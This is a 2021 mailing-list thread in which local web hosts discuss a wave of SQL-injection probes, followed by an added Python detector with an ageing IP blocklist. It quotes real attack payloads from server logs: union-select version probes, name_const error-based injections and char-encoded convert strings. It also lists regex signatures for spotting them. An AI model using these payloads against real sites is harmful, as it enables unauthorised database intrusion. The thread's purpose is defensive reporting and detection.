[Hidden-tech] Growing Botnet?

Paul Bissex paul at bissex.net
Mon Feb 15 21:25:10 UTC 2021


Hi Mik,

I don't host others' sites these days but I do keep a close eye on 
suspicious requests to my pastebin site (dpaste.com) and maintain a 
blocklist. Out of curiosity I looked for the IPs you shared; none of 
them are currently on my list. No SQL injection attempts either (though 
lots of 404s looking for wp-login.php).

Because of the whack-a-mole syndrome you identify, last year I moved to 
a dynamic blocking setup. I have automation to detect and block 
bad-behaving IPs; then I age them out if they go three days without 
reoffending.

The list is typically 1000 to 2000 IPs long.

I've had good results from this, and zero complaints from users whose IP 
happened to have been previously used by a botnet/spammer.

Good luck!

P

On 2/15/21 2:53 PM, Michael Muller via Hidden-discuss wrote:
>
> Hey HT web hosts out there,
>
> Due to recent hacking attempts against our servers, I have installed 
> an IP Tracker that tracks and blocks any aggressive activity.
>
> Starting late last week we've found a growing number of IP numbers 
> that appear to be attempting SQL Injection attacks. I've pasted a few 
> snippets from our logs, below.
>
> Anyone else seeing this kind of activity on their servers? Every time 
> I block an IP number they move to another IP number. The list of IPs 
> hitting us is growing, and moving across multiple hosts.
>
> So far, I've contacted four different server hosts about the traffic 
> coming from their servers. By far the most "infected" appears to be 
> the Unified Layer family of hosting companies, which includes 
> HostGator Mexico, webhostbox Bigrock India, and a number of others. 
> Additional sources of the attacks are Hetzner.com from Germany; Ozkula 
> from Turkey; and ColoCrossing from Buffalo NY. I'm sure more will be 
> added as the days go on.
>
> Stay safe.
>
> Mik
>
> 94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
> 94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A
> 94.130.76.249 13:38:47 fitzgerald-realestate.com /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))
> 94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1
> 94.130.76.249 13:39:01 fitzgerald-realestate.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
> 94.130.76.249 13:39:03 fitzgerald-realestate.com /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
> 94.130.76.249 13:39:04 fitzgerald-realestate.com /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
> 94.130.76.249 13:39:06 fitzgerald-realestate.com /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1
> 94.130.76.249 13:39:07 fitzgerald-realestate.com /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x
> 94.130.76.249 13:39:09 fitzgerald-realestate.com /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x
>
> 37.247.110.108 08:14:38 Greenfield-MA.gov /z term=Licensing%20AND%201=1
> 37.247.110.108 08:14:42 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
> 37.247.110.108 08:14:44 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
> 37.247.110.108 08:14:46 Greenfield-MA.gov /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x
>
> 192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing
> 192.3.204.226 14:58:56 Greenfield-MA.gov /z term=Licensing2121121121212/1
> 192.3.204.226 14:58:57 Greenfield-MA.gov /z term=Licensing%20AND%201=1
> 192.3.204.226 14:58:59 Greenfield-MA.gov /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
> 192.3.204.226 14:59:00 Greenfield-MA.gov /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x
> ---
> Mik Muller, president
> Montague WebWorks
> 239-R Main Street, Greenfield, MA
> 413-320-5336
> http://MontagueWebWorks.com
> Powered by ROCKETFUSION

-- 
Paul Bissex, software engineer
http://paulbissex.com/
Greenfield MA 01301 USA
413-230-9451
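The two ideas in this thread, spotting the SQL-injection probes Mik pasted and Paul's dynamic blocklist that ages an IP out after three quiet days, fit together in a short detector. The following is an added example written for this archive page, not code from either poster or from their sites. The log line format (IP, time, host, path, query), the signature list, the block threshold of three flagged requests and the sample log lines (documentation-reserved addresses and example.com hosts, modelled on the snippets above) are all assumptions made for the example.

```python
"""Flag SQL-injection probes in request logs and keep an ageing blocklist.

Added example; the log format, signatures and thresholds are assumptions.
"""
import re
from datetime import date, datetime, timedelta
from urllib.parse import unquote

# Signatures matching the probes quoted in the thread plus common variants.
# Case-insensitive because the probes mix case (cOnVeRt) to dodge naive filters.
SQLI_SIGNATURES = [
    (re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I), "union-select"),
    (re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I), "tautology"),
    (re.compile(r"\bconvert\s*\(\s*int\s*,", re.I), "convert-int"),
    (re.compile(r"\bname_const\s*\(", re.I), "name_const"),
    (re.compile(r"\bchar\s*\(\s*\d+", re.I), "char-encoding"),
    (re.compile(r"/\*\*/"), "inline-comment"),
    (re.compile(r"--\s"), "comment-terminator"),
]


def decode_param(raw, rounds=3):
    """Percent-decode until stable (bounded) so double-encoded payloads are caught too."""
    for _ in range(rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def classify(query):
    """Return the names of every signature the decoded query matches (empty if benign)."""
    decoded = decode_param(query)
    return [name for pattern, name in SQLI_SIGNATURES if pattern.search(decoded)]


def parse_line(line):
    """Parse the assumed 'IP HH:MM:SS host path query' format; None if malformed."""
    parts = line.split(None, 4)
    if len(parts) < 5:
        return None
    ip, ts, host, path, query = parts
    return {"ip": ip, "time": ts, "host": host, "path": path, "query": query}


class AgeingBlocklist:
    """Block an IP after `threshold` flagged requests; forget it after `ttl` without reoffending."""

    def __init__(self, threshold=3, ttl=timedelta(days=3)):
        self.threshold = threshold
        self.ttl = ttl
        self.hits = {}      # ip -> number of flagged requests seen
        self.blocked = {}   # ip -> time of the most recent offence

    def observe(self, ip, when, flagged):
        """Record one request; returns True if the IP is (now) blocked."""
        if ip in self.blocked:
            if flagged:
                self.blocked[ip] = when   # reoffending restarts the age-out clock
            return True
        if flagged:
            self.hits[ip] = self.hits.get(ip, 0) + 1
            if self.hits[ip] >= self.threshold:
                self.blocked[ip] = when
                return True
        return False

    def expire(self, now):
        """Drop entries whose last offence is at least `ttl` old; returns the dropped IPs."""
        stale = [ip for ip, last in self.blocked.items() if now - last >= self.ttl]
        for ip in stale:
            del self.blocked[ip]
            self.hits.pop(ip, None)
        return stale

    def is_blocked(self, ip):
        return ip in self.blocked


def process_log(lines, day, blocklist):
    """Classify each line and feed the blocklist; returns [(ip, signatures)] for flagged lines."""
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        when = datetime.combine(day, datetime.strptime(rec["time"], "%H:%M:%S").time())
        sigs = classify(rec["query"])
        blocklist.observe(rec["ip"], when, bool(sigs))
        if sigs:
            flagged.append((rec["ip"], sigs))
    return flagged


# Constructed sample log (not real traffic), shaped like the snippets in the thread.
SAMPLE_LOG = """\
192.0.2.10 13:38:44 example.com /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)))
192.0.2.10 13:38:59 example.com /z term=0%20AND%201=1
192.0.2.10 13:39:01 example.com /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1
198.51.100.7 08:14:38 example.org /z term=Licensing%20AND%201=1
203.0.113.5 09:00:00 example.org /z term=Licensing
203.0.113.5 09:00:03 example.org /search term=Licensing%20and%20permits
""".splitlines()

if __name__ == "__main__":
    bl = AgeingBlocklist()
    for ip, sigs in process_log(SAMPLE_LOG, date(2021, 2, 15), bl):
        print(ip, ",".join(sigs), "BLOCKED" if bl.is_blocked(ip) else "")
```

The decode step matters: the quoted probes arrive percent-encoded (`%2f**%2f`, `%2c`, `%2b`), so matching on the raw query string would miss them, and decoding in a bounded loop catches double-encoded variants without looping forever. Matching signatures only counts toward blocking; a single tautology from an otherwise quiet address stays below the threshold, which is what keeps false positives low when an address changes hands.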
